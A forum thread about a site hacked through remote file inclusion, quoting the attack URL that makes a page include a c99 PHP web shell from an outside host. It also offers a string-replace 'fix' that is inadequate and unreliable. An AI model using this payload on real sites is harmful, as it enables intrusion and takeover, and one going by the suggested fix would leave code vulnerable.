Hacking Shell Script...

How does this work? http://www.blucow.net/mikes/c99.txt? My friend was hacked with this, I will not give his site as it will be hacked again. Basically what happens is on some sites they are not setup securely and you can do something like this index.php?page=http://www.blucow.net/mikes/c99.txt? and you can view there whole system, like how much space they're using, how much is free, etc. You can also edit, rename, delete, move, etc. files. How does this file work?

Its a RFI or a remote file inclusion. It allows people to run their scripts on your site.

$page = str_replace("/", "", $_GET['page']); include ($page);

That should stop it

I have a question about this then, if I made a script that used $_GET to take data and put it into iframes (take websites in a form, and then show them in a website) and they put in that script as the url, would they have access to my server or would they just see the .txt file?

Happysmileman wrote: $page = str_replace("/", "", $_GET['page']); include ($page);

That should stop it

Thanks, I'll give that to my friend!